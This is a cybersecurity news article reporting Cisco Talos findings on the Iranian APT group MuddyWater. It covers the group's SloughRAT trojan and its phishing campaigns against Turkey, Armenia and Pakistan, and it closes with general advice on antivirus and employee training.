Iranian APT Supergroup MuddyWater has been identified as the hackers linked to attempted phishing attacks against Turkey and other Asian countries according to findings published by Cisco Talos. The conglomerate, which has been linked to Iran’s Ministry of Intelligence and Security by the U.S. Cyber Command, has been now identified as multiple different subgroups acting under the name of MuddyWater rather than one unified threat actor.
How and when the cyberattacks happened
The hacker group has reportedly been targeting these countries using a Windows script file (WSF) based remote access trojan (RAT) deemed “SloughRAT” by Cisco Talos. Using this form of malware, MuddyWater has attempted to conduct espionage, steal intellectual property and commit ransomware attacks against countries in the Arabian Peninsula the group has zeroed in on. The malicious actors attempted two campaigns against Turkey in November 2021, and targeted Armenia in June of the same year using the same types of Windows executable files.
In April 2021, Cisco Talos observed that this group also launched an attack against Pakistan via two different delivery systems – one employing a PowerShell-based downloader to accept and execute additional PS1 commands from the C2 server and another using malware document infection point that claimed to be part of a court case in Pakistan.
SEE: Google Chrome: Security and UI tips you need to know (TechRepublic Premium)
MuddyWater as a collection of groups
According to Cisco Talos’ findings, the hacking group’s “Variety of lures and payloads — along with the targeting of several different geographic regions — strengthens our growing hypothesis that MuddyWater is a conglomerate of sub-groups rather than a single actor.”
The cybersecurity firm believes that the hacking group is a combination of smaller teams, targeting specific regions such as the Arabian Peninsula and Asia utilizing the different types of attacking techniques above. While MuddyWater is incorporated by smaller sub-groups, Cisco Talos believes that some of these teams are contracted out for attacks by the leaders and organizers of MuddyWater. One reason for this belief is that there have been unique strings and watermarks identified as being shared between MuddyWater and the Phosphorus/Charming Kitten APT groups.
These shared techniques among these smaller teams are seemingly preferred by threat actors in certain regions, making them identifiable as not belonging to the same areas as other attacks by the collective. The two preferred methods of attacks highlighted by the cybersecurity firm were the SloughRAT Windows executable file, and the Ligolo reverse tunneling tool which was used against Middle Eastern countries in March 2021.
SEE: Password breach: Why pop culture and passwords don’t mix (free PDF) (TechRepublic)
How to secure yourself and your business
While this hacker group has been specifically targeting regions and countries throughout the world, cyber threats remain an important thing to keep in mind for both individuals and organizations. With this in mind, it is important to be ready with both antivirus software and extremely thorough training to make sure that systems have not been compromised and employees are aware of the online risks to avoid being victimized.
Subscribe to the Cybersecurity Insider Newsletter
Strengthen your organization's IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices. Delivered Tuesdays and Thursdays